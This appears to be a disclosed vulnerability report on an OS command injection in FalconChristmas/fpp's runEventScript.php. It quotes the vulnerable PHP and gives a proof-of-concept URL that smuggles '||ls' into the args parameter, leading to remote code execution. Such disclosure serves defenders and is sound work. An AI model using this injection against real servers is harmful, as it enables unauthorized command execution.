OS Command Injection in FalconChristmas/fpp

Valid
Reported on May 12th 2021

✍️ Description

In https://github.com/FalconChristmas/fpp/blob/123cdf2eb11062766da333a7a4d85bc0bf620e47/www/runEventScript.php#L32 a command is built using unsanitized user input :

<?php
if ((isset($_GET['scriptName'])) &&
    (file_exists($scriptDirectory . "/" . $_GET['scriptName'])))
{
    $script = $_GET['scriptName'];

    $args = "";
    if (isset($_GET['args']))
        $args = $_GET['args'];

    echo "Running $script $args<br><hr>\n";
    echo "<pre>\n";
    system($SUDO . " $fppDir/scripts/eventScript $scriptDirectory/$script $args"); // scripts and args are user-controlled
    echo "</pre>\n";
}
else
{
?>

🕵️‍♂️ Proof of Concept

Visit : http://127.0.0.1/runEventScript.php?args=||ls&scriptName= Make sure you fulfill this condition file_exists($scriptDirectory . "/" . $_GET['scriptName']) by building an empty directory named scripts in /media

💥 Impact

RCE